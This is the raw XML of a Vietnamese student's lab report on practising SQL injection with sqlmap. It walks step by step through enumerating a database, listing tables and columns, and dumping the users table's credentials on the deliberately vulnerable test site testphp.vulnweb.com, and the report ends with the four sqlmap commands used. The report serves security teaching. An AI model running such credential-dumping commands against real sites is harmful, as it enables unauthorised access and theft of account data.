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0"/>
        <w:gridCol w:w="8459"/>
      </w:tblGrid>
      <w:tr w:rsidR="00370E0C" w:rsidRPr="008A1FD0" w14:paraId="061C2AB4" w14:textId="77777777" w:rsidTr="00603F85">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1180" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="112B1B6C" w14:textId="77777777" w:rsidR="00370E0C" w:rsidRPr="008A1FD0" w:rsidRDefault="00370E0C" w:rsidP="00603F85">
            <w:pPr>
              <w:pStyle w:val="txtTieuDe02"/>
            </w:pPr>
            <w:r w:rsidRPr="008A1FD0">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71814FC6" wp14:editId="08DE4609">
                  <wp:extent cx="609600" cy="609600"/>
                  <wp:effectExtent l="0" t="0" r="0" b="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9" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DC7C5DE" w14:textId="77777777" w:rsidR="00370E0C" w:rsidRDefault="00370E0C" w:rsidP="00603F85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  <w:bookmarkStart w:id="0" w:name="_Toc479091051"/>
            <w:r w:rsidRPr="008A1FD0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>THỰC HÀNH TẤN CÔNG SQL INJECTION</w:t>
            </w:r>
            <w:bookmarkEnd w:id="0"/>
          </w:p>
          <w:p w14:paraId="33FEA200" w14:textId="77777777" w:rsidR="00370E0C" w:rsidRPr="008A1FD0" w:rsidRDefault="00370E0C" w:rsidP="00603F85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Sử dụng sqlmap</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A99B75C" w14:textId="77777777" w:rsidR="00370E0C" w:rsidRPr="008A1FD0" w:rsidRDefault="00370E0C" w:rsidP="00603F85">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="019EEC8C" w14:textId="77777777" w:rsidR="00370E0C" w:rsidRPr="008A1FD0" w:rsidRDefault="00370E0C" w:rsidP="00370E0C">
      <w:pPr>
        <w:pStyle w:val="txtTieuDe03"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48E57054" w14:textId="1FEE0691" w:rsidR="00370E0C" w:rsidRDefault="00370E0C" w:rsidP="00370E0C">
      <w:pPr>
        <w:pStyle w:val="txtTieuDe03"/>
        <w:ind w:firstLine="284"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00070F53">
        <w:t xml:space="preserve">Nhóm học phần:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>20Nh10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE29730" w14:textId="77DB9E86" w:rsidR="00370E0C" w:rsidRPr="00370E0C" w:rsidRDefault="00370E0C" w:rsidP="00370E0C">
      <w:pPr>
        <w:pStyle w:val="txtTieuDe03"/>
        <w:ind w:firstLine="284"/>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Nguyễn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Công Cường</w:t>
      </w:r>
      <w:r w:rsidR="00CB4391">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> – 102200013</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C1C2BF" w14:textId="4EECD2D7" w:rsidR="004E7CE8" w:rsidRDefault="004E7CE8" w:rsidP="00370E0C"/>
    <w:p w14:paraId="5A6C0C37" w14:textId="295E3F31" w:rsidR="00394107" w:rsidRDefault="00394107" w:rsidP="00284DF2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Tổng hợp lệnh tấn công lấy tài khoản, mật khẩu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0953C0" w14:textId="6849E724" w:rsidR="00394107" w:rsidRPr="00394107" w:rsidRDefault="00394107" w:rsidP="00284DF2">
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">acking: </w:t>
      </w:r>
      <w:r w:rsidRPr="001B783D">
        <w:t>http://testphp.vulnweb.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F728642" w14:textId="77777777" w:rsidR="00503458" w:rsidRDefault="00503458" w:rsidP="00284DF2"/>
    <w:p w14:paraId="7F88FD2A" w14:textId="4B6E3EF8" w:rsidR="00394107" w:rsidRDefault="00394107" w:rsidP="00284DF2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>1/ Tìm tên cơ sở dữ liệu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A7A662" w14:textId="09DF56DB" w:rsidR="006E40E4" w:rsidRDefault="006E40E4" w:rsidP="00284DF2">
      <w:r w:rsidRPr="006E40E4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5813BC5D" wp14:editId="6E9283AB">
            <wp:extent cx="3359323" cy="742988"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="57286291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62911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AC0C" w14:textId="56673F34" w:rsidR="00503458" w:rsidRDefault="00503458" w:rsidP="00284DF2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>2/ Tìm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> tên các bảng có trong CSDL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A61189" w14:textId="53775F99" w:rsidR="006E40E4" w:rsidRDefault="006E40E4" w:rsidP="00284DF2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E40E4">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="259B46FA" wp14:editId="50FEA8DB">
            <wp:extent cx="4388076" cy="2038455"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="169988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82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4847" w14:textId="6EF9FC24" w:rsidR="006E40E4" w:rsidRDefault="006E40E4" w:rsidP="00284DF2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>3/ Xác định các cột của bảng users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F53DD48" w14:textId="17833520" w:rsidR="006E40E4" w:rsidRDefault="006E40E4" w:rsidP="00284DF2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E40E4">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F99BE74" wp14:editId="03B879B3">
            <wp:extent cx="5588287" cy="2502029"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10629972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9722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17CF" w14:textId="336BDB0D" w:rsidR="006E40E4" w:rsidRDefault="006E40E4" w:rsidP="00284DF2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>4/ Quét tài khoản, mật khẩu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6883B0" w14:textId="2F3BE5C6" w:rsidR="00503458" w:rsidRDefault="007D0AAF" w:rsidP="00284DF2">
      <w:r w:rsidRPr="007D0AAF">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27EABAF7" wp14:editId="266E4A57">
            <wp:extent cx="5943600" cy="906145"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="151233679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36790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7381" w14:textId="68A713C1" w:rsidR="00A7005A" w:rsidRDefault="00A7005A" w:rsidP="00A7005A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">/ </w:t>
      </w:r>
      <w:r>
        <w:t>Sử</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> dụng mật khẩu tài khoản đã lấy được để đăng nhập</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B0CDB0" w14:textId="77777777" w:rsidR="00A7005A" w:rsidRDefault="00A7005A" w:rsidP="00A7005A">
      <w:r w:rsidRPr="00284DF2">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61CFD11F" wp14:editId="5980A057">
            <wp:extent cx="3601329" cy="3498434"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="560643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432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402" cy="350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0ABB" w14:textId="77777777" w:rsidR="009108C0" w:rsidRDefault="009108C0" w:rsidP="00A7005A"/>
    <w:p w14:paraId="1079F51A" w14:textId="77777777" w:rsidR="009108C0" w:rsidRDefault="009108C0" w:rsidP="00A7005A"/>
    <w:p w14:paraId="7195E404" w14:textId="11B44E89" w:rsidR="00A7005A" w:rsidRPr="009108C0" w:rsidRDefault="009108C0" w:rsidP="00284DF2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Các</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> lệnh đã sử dụng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2596A62C" w14:textId="01870701" w:rsidR="006E40E4" w:rsidRPr="006E40E4" w:rsidRDefault="00503458" w:rsidP="006E40E4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t xml:space="preserve">sqlmap -u "http://testphp.vulnweb.com/search.php?test=query" </w:t>
      </w:r>
      <w:r w:rsidR="006E40E4">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="001B783D">
        <w:t>dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C415ADE" w14:textId="25B08FBD" w:rsidR="006E40E4" w:rsidRDefault="006E40E4" w:rsidP="00503458">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>sqlmap -u "http://testphp.vulnweb.com/search.php?test=query" --tables -D acuart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9AFBC3" w14:textId="609779A6" w:rsidR="006E40E4" w:rsidRDefault="006E40E4" w:rsidP="00503458">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>sqlmap -u “http://testphp.vulnweb.com/search.php?test=query” --columns -D acuart -T users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04604783" w14:textId="7CA42F59" w:rsidR="006E40E4" w:rsidRPr="006E40E4" w:rsidRDefault="006E40E4" w:rsidP="00503458">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>sqlmap -u “http://testphp.vulnweb.com/search.php?test=query” --dump -D acuart -T users</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="006E40E4" w:rsidRPr="006E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DC"/>
    <w:rsid w:val="000852E1"/>
    <w:rsid w:val="00284DF2"/>
    <w:rsid w:val="002F5568"/>
    <w:rsid w:val="00370E0C"/>
    <w:rsid w:val="00394107"/>
    <w:rsid w:val="00412D11"/>
    <w:rsid w:val="00483826"/>
    <w:rsid w:val="004E7CE8"/>
    <w:rsid w:val="00503458"/>
    <w:rsid w:val="005845DC"/>
    <w:rsid w:val="006E40E4"/>
    <w:rsid w:val="007D0AAF"/>
    <w:rsid w:val="00902599"/>
    <w:rsid w:val="009108C0"/>
    <w:rsid w:val="00922646"/>
    <w:rsid w:val="00A7005A"/>
    <w:rsid w:val="00CB4391"/>
    <w:rsid w:val="00DB370B"/>
    <w:rsid w:val="00F7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B356"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{06F4CEE8-FB7E-4B67-BFE6-EAACD090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E0C"/>
    <w:pPr>
      <w:spacing w:before="60" w:after="60" w:line="360" w:lineRule="atLeast"/>
      <w:ind w:firstLine="360"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:noProof/>
      <w:color w:val="000000"/>
      <w:kern w:val="0"/>
      <w:sz w:val="26"/>
      <w:szCs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5DC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noProof w:val="0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5DC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noProof w:val="0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5DC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noProof w:val="0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5DC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noProof w:val="0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5DC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noProof w:val="0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5DC"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="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noProof w:val="0"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5DC"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="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noProof w:val="0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5DC"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="0" w:after="0"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noProof w:val="0"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5DC"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="0" w:after="0"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noProof w:val="0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5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5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5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5DC"/>
    <w:pPr>
      <w:spacing w:before="0"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noProof w:val="0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84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5DC"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
      <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
      <w:ind w:firstLine="360"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="majorBidi"/>
      <w:noProof w:val="0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84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5DC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noProof w:val="0"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84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5DC"/>
    <w:pPr>
      <w:spacing w:before="0"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noProof w:val="0"/>
      <w:color w:val="auto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845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noProof w:val="0"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5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5DC"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="txtNoiDung">
    <w:name w:val="_txtNoiDung"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00370E0C"/>
    <w:pPr>
      <w:ind w:firstLine="284"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="txtTieuDe02">
    <w:name w:val="_txtTieuDe02"/>
    <w:basedOn w:val="TOCHeading"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00370E0C"/>
    <w:pPr>
      <w:keepLines w:val="0"/>
      <w:spacing w:before="0" w:line="252" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Verdana" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Verdana" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="auto"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="txtTieuDe03">
    <w:name w:val="_txtTieuDe03"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00370E0C"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00370E0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0E0C"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="0" w:line="360" w:lineRule="atLeast"/>
      <w:ind w:firstLine="360"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:noProof/>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="txtCommand">
    <w:name w:val="_txtCommand"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00F77C39"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="240" w:line="276" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
      <w:b/>
      <w:bCs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Cong</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Cuong Nguyen Cong</cp:lastModifiedBy>
  <cp:revision>14</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-08-31T02:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-31T03:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>